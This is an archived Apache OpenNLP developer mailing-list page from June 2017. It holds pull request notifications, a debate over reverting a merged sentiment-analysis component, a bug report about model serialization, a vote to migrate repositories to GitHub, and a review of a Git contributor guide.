[GitHub] opennlp pull request #239: OPENNLP-1102: Adjust test for contraction change

2017-06-30 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/239


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #240: OPENNLP-1105: Add a profile and category for high...

2017-06-30 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/240

OPENNLP-1105: Add a profile and category for high mem tests

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1105

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/240.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #240


commit c5b8162aea8cec2204983d85f544782fe87f9336
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-30T09:49:16Z

OPENNLP-1105: Add a profile and category for high mem tests




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #239: OPENNLP-1102: Adjust test for contraction change

2017-06-29 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/239

OPENNLP-1102: Adjust test for contraction change

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1102

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/239.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #239


commit fa64a39f1ab4ebb8112b8e327e0a7dfd42f55588
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-29T23:05:51Z

OPENNLP-1102: Adjust test for contraction change




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/238


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
One more thing, in case we check in models for unit tests we need to
be able to train them again, we might not support those models forever
and then it would be bad if we can't use the tests anymore or need to
repair them by hand.

Jörn

On Thu, Jun 29, 2017 at 7:18 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> For 2. I would like to suggest that we implement doccat format support
> to train on that data.
>
> 3. it would be best so think about how we want to test the doccat
> component, today we don't have any tests which use lots of data to
> evaluate it.
> Probably the sentitment data could solve this for us and a train and
> evaluate test could be included in the eval tests.
>
> +1 to revert and then do these steps after the 1.8.1 release.
>
> I can apply my PR myself if nobody objects.
>
> Jörn
>
> On Thu, Jun 29, 2017 at 7:10 PM, Chris Mattmann <mattm...@apache.org> wrote:
>> Hi Rodrigo,
>>
>> This is very useful feedback that I wish we would have had a long time ago.
>>
>> I will look into it and see if I can reproduce the CLI error. I did a full 
>> build and mvn
>> install (which I though would run tests?) before commiting and as I posted 
>> in JIRA
>> the tests passed for me? So I will have to look into that.
>>
>> That said, given your feedback that SentimentME and the Sentiment Component
>> doesn’t offer much over Document Classifier I agree with you, but wasn’t 
>> super
>> familiar with the Document Classifier API. That said, if we can get the same 
>> functionality
>> by just using Document Classifier why don’t we:
>>
>> 1. Remove the SentimentME and associated code (except for the unit tests)
>> 2. Use the sample datasets from NetFlix & Stanford Treebank sentiment and
>> build models using Document Classifier API.
>> 3. Rename and keep the unit tests that test against Netflix and Stanford 
>> tree bank.
>>
>> That way we get basic sentiment analysis (that is working for us internally 
>> at JPL decently),
>> for Apache OpenNLP, and then if we want to build something better than a 
>> Document
>> Classification approach to sentiment we can do so.
>>
>> Thoughts?
>>
>> Thanks for your useful feedback. If everyone agrees this is a plan I can 
>> back out the code
>> using Joern’s revert, and then try and execute 1-3 above in a branch first. 
>> Thanks.
>>
>> Cheers,
>> Chris
>>
>>
>>
>> On 6/29/17, 10:03 AM, "Rodrigo Agerri" <rage...@apache.org> wrote:
>>
>> Hi Chris,
>>
>> I have been interested in the new sentiment component for a while,
>> although truth to be told, I did not follow that closely. I have today
>> looked at it and test it with some of the corpora you have mentioned.
>> In order to do that, I checkout master to work with from this commit
>> onwards
>>
>> 
>> https://github.com/apache/opennlp/commit/56321aab51a470cd2004b76fb1f5330881b943c1
>>
>> 1. I tried to run it from the CLI. The Sentiment component did not
>> appear to be available.
>> 2. I added the SentimentTrainer and Evaluator to the cmdline.CLI (no
>> SentimentTool is implemented to tag with a trained model).
>> 3. After that, the CLI tests did not pass. So, the CLI is currently
>> non functional, unless I did something wrong, always possible, of
>> course. See if you can reproduce that error.
>>
>> I therefore did the tests via API. I implemented a little test for
>> training, evaluating and tagging here:
>>
>> https://github.com/ixa-ehu/ixa-pipe-doc/tree/test
>>
>> I run the training on the large movies review from Stanford for binary
>> polarity classification
>>
>> http://ai.stanford.edu/~amaas/data/sentiment/
>>
>> and on the two little samples multiclass files added in resources and
>> mentioned in the previous email, using the first one for training and
>> the second one for testing (maxent 100 iterations, cutoff 5).
>>
>> 2. Stanford results: 0.84264
>> 3. sample multiclass: 0.73
>>
>> Given that this is a standard document classification task, I decided
>> to train the doccat component from the CLI:
>>
>> 1. Stanford results: 0.84264 (BOW features by default).
>> 2. sample multiclass: 0.73
>>
>> I then looked at the code of the sentiment component and saw that it
>> is basically a document classifier working with bag of words features.
>> No added functionality. So, my conclusions ar

Re: Missing serializer for postagger.bin

2017-06-29 Thread Joern Kottmann
This is fixed now in the master branch, would you mind to try it again?

Jörn

On Wed, Jun 14, 2017 at 4:31 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> We have to fix this, William wrote a unit test to reproduce it.
>
> Jörn
>
> On Fri, Jun 9, 2017 at 4:31 PM, Damiano Porta <damianopo...@gmail.com>
> wrote:
>>
>> Jorn,
>> the last snapshot 1.8.1-snapshot has fixed the problem with dictionaries
>> (PR #220) but the problem with the postagger serialization still here. i
>> can confirm that the last snapshot cannot serialize the postagger using
>> the
>> cmd tool,
>>
>> *opennlp TokenNameFinderTrainer -data /home/damiano/corpus.train -lang it
>> -model /home/damiano/it-tuoagente-perceptron-custom.bin -featuregen
>> /home/damiano/test.xml -sequenceCodec BIO -resources
>> /home/damiano/lavoro/java/Parser/src/main/resources/*
>>
>>
>> *Writing name finder model ... Compressed 885605 parameters to 94030*
>> *3451 outcome patterns*
>> *Exception in thread "main" java.lang.IllegalStateException: Missing
>> serializer for it-pos-maxent.bin*
>> * at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:592)*
>> * at opennlp.tools.cmdline.CmdLineUtil.writeModel(CmdLineUtil.java:182)*
>> * at
>>
>> opennlp.tools.cmdline.namefind.TokenNameFinderTrainerTool.run(TokenNameFinderTrainerTool.java:188)*
>> * at opennlp.tools.cmdline.CLI.main(CLI.java:244)*
>>
>> I have used this generators.xml file:
>>
>> **
>> **
>> **
>> **
>> **
>> **
>> **
>> **
>> **
>> * *
>> **
>> **
>> **
>> *   *
>> **
>> **
>> **
>> *  *
>> **
>> **
>> **
>>
>>
>>
>>
>> 2017-06-09 15:17 GMT+02:00 Damiano Porta <damianopo...@gmail.com>:
>>
>> > Jorn,
>> > At the moment i am using the command tool to train my ner model, but i
>> > am
>> > getting this error:
>> >
>> > *opennlp TokenNameFinderTrainer -data /home/damiano/corpus.train -lang
>> > it
>> > -model /home/damiano/it-person-perceptron.bin -featuregen
>> > /home/damiano/test.xml -sequenceCodec BIO -resources
>> > /home/damiano/lavoro/java/Parser/src/main/resources/*
>> >
>> > *Exception in thread "main"
>> >
>> > opennlp.tools.namefind.TokenNameFinderModel$FeatureGeneratorCreationError:
>> > opennlp.tools.util.InvalidFormatException: No dictionary resource for
>> > key:
>> > nations.dictionary*
>> > at
>> > opennlp.tools.namefind.TokenNameFinderFactory.createFeatureGenerators(
>> > TokenNameFinderFactory.java:209)
>> > at opennlp.tools.namefind.TokenNameFinderFactory.createContextGenerator(
>> > TokenNameFinderFactory.java:150)
>> > at opennlp.tools.namefind.NameFinderME.train(NameFinderME.java:241)
>> > at opennlp.tools.cmdline.namefind.TokenNameFinderTrainerTool.run(
>> > TokenNameFinderTrainerTool.java:169)
>> > at opennlp.tools.cmdline.CLI.main(CLI.java:244)
>> > Caused by: opennlp.tools.util.InvalidFormatException: No dictionary
>> > resource for key: nations.dict
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > DictionaryFeatureGeneratorFactory.create(GeneratorFactory.java:251)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > AggregatedFeatureGeneratorFactory.create(GeneratorFactory.java:130)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > CachedFeatureGeneratorFactory.create(GeneratorFactory.java:172)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > AggregatedFeatureGeneratorFactory.create(GeneratorFactory.java:130)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.create(
>> > GeneratorFactory.java:782)
>> > at
>> > opennlp.tools.namefind.TokenNameFinderFactory.createFeatureGenerators

Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
Which data sets did you use to evaluate this?
I was looking for a bit more than a sample file to train it.

I noticed that you checked in stanford and netflix models.

The stanford data set is probably this one:
http://ai.stanford.edu/~amaas/data/sentiment/

Do you have a link for the netflix data?

Jörn

On Thu, Jun 29, 2017 at 4:00 PM, Chris Mattmann <mattm...@apache.org> wrote:
> Absolutely you can find it here:
>
> opennlp-tools/src/test/resources/opennlp/tools/sentiment/sample_train_categ 
> (for categorical /multi-class)
> opennlp-tools/src/test/resources/opennlp/tools/sentiment/sample_train_categ2 
> (for categorical/multi-class)
>
> We can also do similar files where instead of multi-class, we just use 
> pos/neg as the label.
>
> Cheers,
> Chris
>
>
>
>
>
> On 6/29/17, 2:35 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>
> Hello Chris,
>
> could you please point me to files I can use to train the sentiment
> component? I am currently looking again through the code and would
> like to train it myself.
>
> Jörn
>
> On Tue, Jun 27, 2017 at 4:59 PM, Dan Russ <danrus...@gmail.com> wrote:
> > Hi All,
> >First, let me take a share of blame for the comment Chris mentioned. 
>  I believe I said something like the pull request was X revision behind and Y 
> revisions ahead.  It was not meant to be rude, it was meant to say it is hard 
> to review code when it is so different from the current code base. I am very 
> excited that sentiment analysis is going to be added to OpenNLP, but I have 
> not had time to play with it. If I were to say “great job” before I have add 
> a chance to look at it, it would be flattery not honest praise.
> >
> >   Let’s clean up the merge.  I agree with Chris that scalability and 
> perfection should not be our initial goal.  Let’s get something, and we can 
> decide how to optimize later (even if it require a complete rewrite).  
> Perfection is the enemy of the good.
> >
> >   Finally, because of Chris’ comments it is hard to thank Ana and Chris 
> without sounding insincere.  But I’ll try, thank you Chris and Ana.  I hope 
> we can get beyond this and that Chris and Ana will continue to improve the 
> performance of the sentiment analysis tool and happily remain part of the 
> OpenNLP family.  It is also a good time to toss a big thank you to all of the 
> committers, users, and PMC member.  I use OpenNLP almost everyday.  Your work 
> is extremely valuable to me.
> >
> > Thank you,
> > Daniel
> >
> >> On Jun 27, 2017, at 10:25 AM, Chris Mattmann <mattm...@apache.org> 
> wrote:
> >>
> >> Hi everyone,
> >>
> >> I spoke with Joern in Slack. Some of his concerns are:
> >>
> >> 1. This was done with a Merge commit and apparently they squash and 
> rebase.
> >> [would be helpful to see some pointer on this for documentation, thus 
> far I
> >> haven’t found any]
> >> 2. Apparently we literally need to ask others for +1 votes and record 
> them
> >> before committing? I thought since Ana and I are committers aren were 
> +1,
> >> and since Joern had been providing feedback (the last of which was to 
> add
> >> tests, which we did) that he would be +1 as well (I guess he is not, 
> and I guess
> >> formally we need to do a +1 vote even still)
> >> 3. There was concern about scalability of the code.
> >> 4. There are thoughts that the code was not perfect yet (even though 
> it works
> >> fine in the MEMEX project for Ana and I)
> >>
> >> So, Joern has opened up a revert PR.
> >>
> >> I suppose I should state I find this process extremely heavyweight and 
> unwelcoming.
> >> To me, there should be a modicum of trust for committers, but I feel 
> like even as a
> >> committer, I am operating as a “contributor” to the project. Committer 
> means that
> >> there is trust to modify the source code base. Of the issues above, 
> the only one I see
> >> as a moderate snafu was #1, and frankly if there are some instructions 
> that show me
> >> how to do squashing and rebasing *first* I will try to do that in the 
> future since I am
> >> not a GIt expert.
> >>
> >> That said, I must state I feel pretty put off by Apache OpenNLP. This 
> originated as a GSoC
> >> effort, and we have worked pretty consistently on this over the last 
> year. We used a
> >

Re: [VOTE] Migrate our main repositories to GitHub

2017-06-29 Thread Joern Kottmann
Yes, this is delaying our release now by two days and we already
reached consent.

Jörn

On Wed, Jun 28, 2017 at 4:03 PM, Chris Mattmann <mattm...@apache.org> wrote:
> Hi Joern,
>
> VOTEs need to stay open for at least 72 hours…for everyone and time zones, 
> etc.
>
> Is there some rush here?
>
> Cheers,
> Chris
>
>
>
>
> On 6/28/17, 3:57 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>
> The vote passes, only +1 votes have been received:
> +1 Mark G
> +1 Rodrigo Agerri
> +1 Jeff Zemerick
> +1 Suneel Marthi
> +1 Jörn Kottmann
> +1 William Colen
> +1 Dan Russ
> +1 Anthony Beylerian
> +1 Chris Mattmann
> +1 Oleg Tikhonov
> +1 Tommaso Teofili
>
> Jörn
>
> On Wed, Jun 28, 2017 at 10:27 AM, Tommaso Teofili
> <tommaso.teof...@gmail.com> wrote:
> > +1 to migrate to gitbox [1]
> >
> > Regards,
> > Tommaso
> >
> > [1] : https://gitbox.apache.org/
> >
> > Il giorno mar 27 giu 2017 alle ore 21:54 Oleg Tikhonov 
> <o...@apache.org> ha
> > scritto:
> >
> >> [x] +1 Migrate all repositories to GitHub
> >>
> >>
> >>
> >> On Tue, Jun 27, 2017 at 10:48 PM, Chris Mattmann <mattm...@apache.org>
>     >> wrote:
> >>
> >> > If you are talking about using Apache Gitbox, then yes I am +1 for 
> this.
> >> >
> >> > Thanks,
> >> > Chris
> >> >
> >> >
> >> >
> >> >
> >> > On 6/27/17, 3:30 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
> >> >
> >> > Hello all,
> >> >
> >> > lets decide here if we want to move our main repository, 
> currently
> >> > hosted at Apache to GitHub instead. This will make our process a 
> bit
> >> > easier because we can eliminate one remote from our workflow.
> >> >
> >> >  [ ] +1 Migrate all repositories to GitHub
> >> >  [ ] -1 Do not migrate,  because...
> >> >
> >> > Thanks,
> >> > Jörn
> >> >
> >> >
> >> >
> >> >
> >>
>
>
>


Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
Hello Chris,

could you please point me to files I can use to train the sentiment
component? I am currently looking again through the code and would
like to train it myself.

Jörn

On Tue, Jun 27, 2017 at 4:59 PM, Dan Russ <danrus...@gmail.com> wrote:
> Hi All,
>First, let me take a share of blame for the comment Chris mentioned.  I 
> believe I said something like the pull request was X revision behind and Y 
> revisions ahead.  It was not meant to be rude, it was meant to say it is hard 
> to review code when it is so different from the current code base. I am very 
> excited that sentiment analysis is going to be added to OpenNLP, but I have 
> not had time to play with it. If I were to say “great job” before I have add 
> a chance to look at it, it would be flattery not honest praise.
>
>   Let’s clean up the merge.  I agree with Chris that scalability and 
> perfection should not be our initial goal.  Let’s get something, and we can 
> decide how to optimize later (even if it require a complete rewrite).  
> Perfection is the enemy of the good.
>
>   Finally, because of Chris’ comments it is hard to thank Ana and Chris 
> without sounding insincere.  But I’ll try, thank you Chris and Ana.  I hope 
> we can get beyond this and that Chris and Ana will continue to improve the 
> performance of the sentiment analysis tool and happily remain part of the 
> OpenNLP family.  It is also a good time to toss a big thank you to all of the 
> committers, users, and PMC member.  I use OpenNLP almost everyday.  Your work 
> is extremely valuable to me.
>
> Thank you,
> Daniel
>
>> On Jun 27, 2017, at 10:25 AM, Chris Mattmann <mattm...@apache.org> wrote:
>>
>> Hi everyone,
>>
>> I spoke with Joern in Slack. Some of his concerns are:
>>
>> 1. This was done with a Merge commit and apparently they squash and rebase.
>> [would be helpful to see some pointer on this for documentation, thus far I
>> haven’t found any]
>> 2. Apparently we literally need to ask others for +1 votes and record them
>> before committing? I thought since Ana and I are committers aren were +1,
>> and since Joern had been providing feedback (the last of which was to add
>> tests, which we did) that he would be +1 as well (I guess he is not, and I 
>> guess
>> formally we need to do a +1 vote even still)
>> 3. There was concern about scalability of the code.
>> 4. There are thoughts that the code was not perfect yet (even though it works
>> fine in the MEMEX project for Ana and I)
>>
>> So, Joern has opened up a revert PR.
>>
>> I suppose I should state I find this process extremely heavyweight and 
>> unwelcoming.
>> To me, there should be a modicum of trust for committers, but I feel like 
>> even as a
>> committer, I am operating as a “contributor” to the project. Committer means 
>> that
>> there is trust to modify the source code base. Of the issues above, the only 
>> one I see
>> as a moderate snafu was #1, and frankly if there are some instructions that 
>> show me
>> how to do squashing and rebasing *first* I will try to do that in the future 
>> since I am
>> not a GIt expert.
>>
>> That said, I must state I feel pretty put off by Apache OpenNLP. This 
>> originated as a GSoC
>> effort, and we have worked pretty consistently on this over the last year. 
>> We used a
>> separate GitHub project to get started, kept Joern involved as another 
>> mentor, even
>> provided access and commit writes to that GitHub repository for a long time, 
>> so this
>> code was developed in the open. Joern even created a branch in ApacheOpenNLP 
>> in the code and I suppose
>> I should have gone and worked on that branch first since master is 
>> apparently so
>> pristine that even an Apache veteran like me can’t get something in to it 
>> without
>> making a whole bunch of (what are IMO minor issues, and what are IMO 
>> heavyweight
>> “community” issues).
>>
>> I am concerned from a community point of view that the first comment wasn’t 
>> “Great
>> job Chris, you got Sentiment Analysis into Apache, *but* I have these 
>> concerns 1-4 above”.
>> It was “The PR was merged wrong in ways 1-4 and I’m going to revert it.”
>>
>> That’s pretty off-putting to someone who is semi-new like me and like Ana.
>>
>> Anyways, go ahead and revert it. Sorry to have caused any issues.
>>
>> Chris
>>
>>
>>
>> On 6/27/17, 7:06 AM, "Chris Mattmann" <mattm...@apache.org> wrote:
>>
>>Hi Joern,
>>
>>I’m confused. Why did you revert

Re: [VOTE] Migrate our main repositories to GitHub

2017-06-28 Thread Joern Kottmann
The vote passes, only +1 votes have been received:
+1 Mark G
+1 Rodrigo Agerri
+1 Jeff Zemerick
+1 Suneel Marthi
+1 Jörn Kottmann
+1 William Colen
+1 Dan Russ
+1 Anthony Beylerian
+1 Chris Mattmann
+1 Oleg Tikhonov
+1 Tommaso Teofili

Jörn

On Wed, Jun 28, 2017 at 10:27 AM, Tommaso Teofili
<tommaso.teof...@gmail.com> wrote:
> +1 to migrate to gitbox [1]
>
> Regards,
> Tommaso
>
> [1] : https://gitbox.apache.org/
>
> Il giorno mar 27 giu 2017 alle ore 21:54 Oleg Tikhonov <o...@apache.org> ha
> scritto:
>
>> [x] +1 Migrate all repositories to GitHub
>>
>>
>>
>> On Tue, Jun 27, 2017 at 10:48 PM, Chris Mattmann <mattm...@apache.org>
>> wrote:
>>
>> > If you are talking about using Apache Gitbox, then yes I am +1 for this.
>> >
>> > Thanks,
>> > Chris
>> >
>> >
>> >
>> >
>> > On 6/27/17, 3:30 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>> >
>> > Hello all,
>> >
>> > lets decide here if we want to move our main repository, currently
>> > hosted at Apache to GitHub instead. This will make our process a bit
>> > easier because we can eliminate one remote from our workflow.
>> >
>> >  [ ] +1 Migrate all repositories to GitHub
>> >  [ ] -1 Do not migrate,  because...
>> >
>> > Thanks,
>> > Jörn
>> >
>> >
>> >
>> >
>>


[GitHub] opennlp-site issue #21: OPENNLP-1045: Add Git development page (adapted from...

2017-06-27 Thread kottmann
Github user kottmann commented on the issue:

https://github.com/apache/opennlp-site/pull/21
  
@kinow this will now change a bit again due to the migration to GitHub, I 
propose we hold it off another week. 


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-27 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r124306989
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to setup Git for committers and contributors. 
Contributors can safely setup Git any way they
+choose but committers should take extra care since they can push new 
commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but 
very small changes should go through a PR,
+even for committers. To keep the commit history clean take note of the use 
of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to 
push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will 
want to fork GitHub's apache/opennlp to your own
+account on GitHub, this will enable Pull Requests of your own. Cloning 
this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform 
"git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache 
https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+originhttps://github.com/your-github-id/opennlp.git (fetch)
+originhttps://github.com/your-github-id/opennlp.git (push)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
+Now if you want to experiment with a branch, this by default points to 
your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to 
merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not 
**apache**
+
+Once you are ready to commit to the Apache remote you can merge and push 
them directly, or better yet create a
+pull request (PR). 
+
+## How to create a PR (committers)
+
+Push your branch to GitHub:
+
+git checkout opennlp-
+git push origin opennlp-
+
+Go to your opennlp- branch on GitHub. Since you forked it from 
GitHub's apache/opennlp it will default any PR to
+go to apache/master. 
+
+* Click the green "Compare, review, and create pull request" button. 
+* You can edit the _to_ and _from_ for the PR if it is not correct. The 
"base fork" should be apache/opennlp unless
+you are collaborating separately with one of the committers on the list. 
The "base" will be master. Do not submit a
+PR to one of the other branches unless you know what you are doing. The 
"head fork" will be your forked repo and the
+"compare" will be your opennlp- branch. 
+* Click the "Create pull request" button and name the request 
"OPENNLP-" (uppercase). This will connect the
+comments of the PR to the mailing list and JIRA comments.
+* From now on the PR lives on GitHub's apache/opennlp. You can use the 
commenting UI there. 
+* If you are looking for a review or sharing with someone else say so in 
the comments but do not worry about 
+automated merging of your PR -- you will have to do that later. The P

[VOTE] Migrate our main repositories to GitHub

2017-06-27 Thread Joern Kottmann
Hello all,

lets decide here if we want to move our main repository, currently
hosted at Apache to GitHub instead. This will make our process a bit
easier because we can eliminate one remote from our workflow.

 [ ] +1 Migrate all repositories to GitHub
 [ ] -1 Do not migrate,  because...

Thanks,
Jörn


Re: [VOTE] Migrate our main repositories to GitHub

2017-06-27 Thread Joern Kottmann
+1

Jörn

On Tue, Jun 27, 2017 at 12:30 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> Hello all,
>
> lets decide here if we want to move our main repository, currently
> hosted at Apache to GitHub instead. This will make our process a bit
> easier because we can eliminate one remote from our workflow.
>
>  [ ] +1 Migrate all repositories to GitHub
>  [ ] -1 Do not migrate,  because...
>
> Thanks,
> Jörn


[GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-27 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/238

Revert merging of sentiment work, no consent to merge it

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp revert_sentiment

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/238.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #238


commit 123222eb34724bae793e9d6d22e202c0aee0aa45
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-27T08:19:19Z

Revert merging of sentiment work, no consent to merge it




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #237: OPENNLP-1092: Fix pos model serialization bug

2017-06-26 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/237

OPENNLP-1092: Fix pos model serialization bug

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

